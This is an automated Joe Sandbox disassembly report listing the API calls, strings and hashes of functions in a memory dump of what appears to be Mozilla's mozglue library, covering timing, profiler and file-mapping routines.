Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: Ddl$Ddl$MOZ_CRASH()$\dl
API String ID: 2055633661-3535199040
Opcode ID: b1dc7abf910dd4aed38db2e52fe3934edec706ad679f38a63fe922b0a1bc8a6e
Instruction ID: abff4b3e36cfad054f058416ebfda1b5298cfff436e17d65de2243563348e47a
Opcode Fuzzy Hash: b1dc7abf910dd4aed38db2e52fe3934edec706ad679f38a63fe922b0a1bc8a6e
Instruction Fuzzy Hash: E641C275B043158BDB00EFB9CC84BAE7AB5EB8A358F00C029E91597740D7709805CBDA

Function 6C5E5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C5E56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5E56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C5E56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C5E5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C5E57BC
GetTickCount64.KERNEL32 ref: 6C5E58CB
EnterCriticalSection.KERNEL32(6C64F688), ref: 6C5E58F3
__aulldiv.LIBCMT ref: 6C5E5945
LeaveCriticalSection.KERNEL32(6C64F688), ref: 6C5E59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C64F638,?,?,?,?), ref: 6C5E59E9

Strings

MOZ_APP_RESTART, xrefs: 6C5E56CC

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: c1477b2d90c6524a2bb61dda34fb2f455ce49293c74ad2e95a0b69beee0f0926
Instruction ID: ed6522c7c278d40a7eb7ff00bce1c29744eb3e05236ffaa377728bf990497998
Opcode Fuzzy Hash: c1477b2d90c6524a2bb61dda34fb2f455ce49293c74ad2e95a0b69beee0f0926
Instruction Fuzzy Hash: 00C18C31A093509FD705DF29C88066ABBF1FFCA758F45CA1DE8C897661D730A885CB86

Function 6C60EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5D4A68), ref: 6C60945E
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C609470
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C609482
Part of subcall function 6C609420: __Init_thread_footer.LIBCMT ref: 6C60949F

GetCurrentThreadId.KERNEL32 ref: 6C60EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60EC8C

Part of subcall function 6C6094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6094EE
Part of subcall function 6C6094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C609508

GetCurrentThreadId.KERNEL32 ref: 6C60ECA1
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C60ECC5
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C60ED19
CloseHandle.KERNEL32(?), ref: 6C60ED28
free.MOZGLUE(00000000), ref: 6C60ED2F
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C60EC94

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 1fd8ebe4facb339a744479fc756eb73d7baa5716f362e840e26c035b1d76682d
Instruction ID: 660f78cd5691f4a94064f3ba340cac28532e0e0ccb9f7d51e6442462070bb79c
Opcode Fuzzy Hash: 1fd8ebe4facb339a744479fc756eb73d7baa5716f362e840e26c035b1d76682d
Instruction Fuzzy Hash: 2821D375700514ABDB04AF26D944AAE7779EF8636CF10C210FD18A7781DB719806CBAE

Function 6C608ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C5CEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5CEB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C60B392,?,?,00000001), ref: 6C6091F4

Part of subcall function 6C5FCBE8: GetCurrentProcess.KERNEL32(?,6C5C31A7), ref: 6C5FCBF1
Part of subcall function 6C5FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5C31A7), ref: 6C5FCBFA

Strings

name, xrefs: 6C608F16
marker-table, xrefs: 6C60906C
timeline-fileio, xrefs: 6C6090A4
stack-chart, xrefs: 6C6090B2
marker-chart, xrefs: 6C60905E
timeline-memory, xrefs: 6C609088
data, xrefs: 6C6090E8
timeline-ipc, xrefs: 6C609096
timeline-overview, xrefs: 6C60907A

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: efe7cb1cb754f2415e859944c38ca58ac3ffb61abbda55d6f2087efee2d719e9
Instruction ID: 806c378f4c62dc2c7c52e9aa2cefb83faa9fe78a47a15f069748f067a428d5d7
Opcode Fuzzy Hash: efe7cb1cb754f2415e859944c38ca58ac3ffb61abbda55d6f2087efee2d719e9
Instruction Fuzzy Hash: 80B1B5B0B11219DBDB08CF98C9967EEBBB6AF84308F109019D405ABF80D771AD45CBD9

Function 6C5EC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C5EC5A3
WideCharToMultiByte.KERNEL32 ref: 6C5EC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C5EC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C5ECA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5ECA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5ECAA5

Strings

0, xrefs: 6C5ED30A
(null), xrefs: 6C5EC596

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 84f4dfa2ba1ed5edcd589cf3f580ef308c00870a7253d9f633983a5d5a0db6bf
Instruction ID: 23c90888c69aff3a10da8954314ce53970740d8f6ae9ba1125b9059873129b24
Opcode Fuzzy Hash: 84f4dfa2ba1ed5edcd589cf3f580ef308c00870a7253d9f633983a5d5a0db6bf
Instruction Fuzzy Hash: ADA189306083429FDB10EF29C994B5BBBE5AFCD748F14892DE89A97741D731E805CB86

Function 6C5C3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5C3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5C34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5C34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C5C350E
__Init_thread_footer.LIBCMT ref: 6C5C3522
__aulldiv.LIBCMT ref: 6C5C3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5C357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5C3592

Part of subcall function 6C5FAB89: EnterCriticalSection.KERNEL32(6C64E370,?,?,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284), ref: 6C5FAB94
Part of subcall function 6C5FAB89: LeaveCriticalSection.KERNEL32(6C64E370,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5FABD1

Strings

kernel32.dll, xrefs: 6C5C34EA
GetSystemTimePreciseAsFileTime, xrefs: 6C5C3508

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 103f7e3cbf6cc1c801bfb172f8485adbbc082ae7cd87339741272227dd20a528
Instruction ID: 15bf4787394a51c8d634e7345ae0f2ba64464c8f4ff12c99b794cebdfd97a1b4
Opcode Fuzzy Hash: 103f7e3cbf6cc1c801bfb172f8485adbbc082ae7cd87339741272227dd20a528
Instruction Fuzzy Hash: 7D319375B002499BDF04EFBACC88EAE77B5FB86309F10C419E515A3650EB70A905CF66

Function 6C5C4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C604843,?), ref: 6C5C45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C604843,?), ref: 6C5C468A
free.MOZGLUE(?,?,?,?,?,?,6C604843,?), ref: 6C5C46C9
free.MOZGLUE(?), ref: 6C5C46EF
free.MOZGLUE(?), ref: 6C5C4712
free.MOZGLUE(?), ref: 6C5C4735
free.MOZGLUE(?), ref: 6C5C4758
free.MOZGLUE(?), ref: 6C5C477B
free.MOZGLUE(?), ref: 6C5C479E

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 64c49cc0a9088f3c1bad03ec42a1d0caf4abf7378532fbf5fbd5944e66d7942c
Instruction ID: 9e8577b9d8768de45ec16bd8bd2f5d8f5310f6918295dba1e4282b946527d9e1
Opcode Fuzzy Hash: 64c49cc0a9088f3c1bad03ec42a1d0caf4abf7378532fbf5fbd5944e66d7942c
Instruction Fuzzy Hash: 91B1E371B001518FDB18CEACCCD0B7D76B2AF85328F18466DE816DBBC6E73498408B82

Function 6C62AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C62AC52
CreateFileMappingW.KERNEL32 ref: 6C62AC7D
GetSystemInfo.KERNEL32 ref: 6C62AC98
MapViewOfFile.KERNEL32 ref: 6C62ACB0
GetSystemInfo.KERNEL32 ref: 6C62ACCD
MapViewOfFile.KERNEL32 ref: 6C62AD05
UnmapViewOfFile.KERNEL32 ref: 6C62AD1C
CloseHandle.KERNEL32 ref: 6C62AD28
UnmapViewOfFile.KERNEL32 ref: 6C62AD37
CloseHandle.KERNEL32 ref: 6C62AD43
CloseHandle.KERNEL32 ref: 6C62AD67

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 58cefe539437607c0d999f308b4c7a5a9f55865fa748e966f6d933fa4391df99
Instruction ID: e56948ba5a78a12f7c6d10205341decc59dc553b84023f2c8cdc0697a498d8e0
Opcode Fuzzy Hash: 58cefe539437607c0d999f308b4c7a5a9f55865fa748e966f6d933fa4391df99
Instruction Fuzzy Hash: 78314FB19047058FDB00BF7DD68866EBBF0BF85305F018929E99986211EB749449CB96

Function 6C5D9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C5D9675
__Init_thread_footer.LIBCMT ref: 6C5D9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C5D96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C5D9707
__Init_thread_footer.LIBCMT ref: 6C5D971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5D9773

Part of subcall function 6C5FAB89: EnterCriticalSection.KERNEL32(6C64E370,?,?,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284), ref: 6C5FAB94
Part of subcall function 6C5FAB89: LeaveCriticalSection.KERNEL32(6C64E370,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5FABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C5D97B7
FreeLibrary.KERNEL32 ref: 6C5D97D0
FreeLibrary.KERNEL32 ref: 6C5D97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5D9824

Strings

ntdll.dll, xrefs: 6C5D96E3
MapViewOfFileNuma2, xrefs: 6C5D97B1
NtMapViewOfSection, xrefs: 6C5D9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C5D9670

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 5150de3acbf14ca25b4f3d4c81f1b707b75d6319122d55ebfa2a3df498adccc0
Instruction ID: 8054ef1ee829ec84192c0220e502b99ae6b98c0343f3a0d89c7cc059adb91ae8
Opcode Fuzzy Hash: 5150de3acbf14ca25b4f3d4c81f1b707b75d6319122d55ebfa2a3df498adccc0
Instruction Fuzzy Hash: A941A375600305DBDF00EFAAEDE4A967BB4EB8A358F01C124ED1597740D734A805CFAA

Function 6C5D7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5D7EA7
malloc.MOZGLUE(00000001), ref: 6C5D7EB3

Part of subcall function 6C5DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C5DCB49
Part of subcall function 6C5DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C5DCBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C5D7EC4
mozalloc_abort.MOZGLUE(?), ref: 6C5D7F19
malloc.MOZGLUE(?), ref: 6C5D7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5D7F4D

Strings

d, xrefs: 6C5D7F89

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 9aceb9b682b47c25e4f5dee9943319623f5a626fbcb8aea7b04d26911c5af811
Instruction ID: f4a3ed533023a93dbf1837ade17cf5fa6e933c0700e2b793b98a1bcc3116a903
Opcode Fuzzy Hash: 9aceb9b682b47c25e4f5dee9943319623f5a626fbcb8aea7b04d26911c5af811
Instruction Fuzzy Hash: 0C311871E0435897DF00EB29CC449FEB778EF96208F059628ED4957612FB30B988C399

Function 6C619D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C618273), ref: 6C619D65
free.MOZGLUE(6C618273,?), ref: 6C619D7C
free.MOZGLUE(?,?), ref: 6C619D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C619E0F
free.MOZGLUE(6C61946B,?,?), ref: 6C619E24
free.MOZGLUE(?,?,?), ref: 6C619E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C619EC8
free.MOZGLUE(6C61946B,?,?,?), ref: 6C619EDF
free.MOZGLUE(?,?,?,?), ref: 6C619EF5

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 54173dc28736ad06bbc8728b0545bd945018299a99984abf491fed4c54636613
Instruction ID: 824f78254bf0265331dbd1c97351cd6d4768a2d67c5679aa7a92048cee96e99c
Opcode Fuzzy Hash: 54173dc28736ad06bbc8728b0545bd945018299a99984abf491fed4c54636613
Instruction Fuzzy Hash: 3A719F70909B41CBD716CF18C88055BF3F4FF99319B84965DE89A9BB02EB30E885CB85

Function 6C61DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C61DDCF

Part of subcall function 6C5FFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5FFA4B

Part of subcall function 6C6190E0: free.MOZGLUE(?,00000000,?,?,6C61DEDB), ref: 6C6190FF
Part of subcall function 6C6190E0: free.MOZGLUE(?,00000000,?,?,6C61DEDB), ref: 6C619108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C61DE0D
free.MOZGLUE(00000000), ref: 6C61DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C61DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C61DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C61DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C60DEFD,?,6C5D4A68), ref: 6C61DF32

Part of subcall function 6C61DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C61DB86
Part of subcall function 6C61DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C61DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C60DEFD,?,6C5D4A68), ref: 6C61DF65
free.MOZGLUE(?), ref: 6C61DF80

Part of subcall function 6C5E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5E5EDB
Part of subcall function 6C5E5E90: memset.VCRUNTIME140(ewbl,000000E5,?), ref: 6C5E5F27
Part of subcall function 6C5E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5E5FB2

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 06c5c04f611a689982775abc814ecb0606b6b1e868b446f39089d4cf291d061c
Instruction ID: bc38a7d3e1809a26fff767bcbe16b83954c646db65151f55e3afd238fbb070f2
Opcode Fuzzy Hash: 06c5c04f611a689982775abc814ecb0606b6b1e868b446f39089d4cf291d061c
Instruction Fuzzy Hash: F851A6726096019FD7229B2DC8806AE73B2AFD570FF95411CD51A53F00DB32F91ACB9A

Function 6C625D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C625C8C,?,6C5FE829), ref: 6C625D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C625C8C,?,6C5FE829), ref: 6C625D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C625C8C,?,6C5FE829), ref: 6C625D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C625C8C,?,6C5FE829), ref: 6C625D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C625C8C,?,6C5FE829), ref: 6C625DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C625C8C,?,6C5FE829), ref: 6C625DC9
std::_Facet_Register.LIBCPMT ref: 6C625DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C625C8C,?,6C5FE829), ref: 6C625E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C625C8C,?,6C5FE829), ref: 6C625E45

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

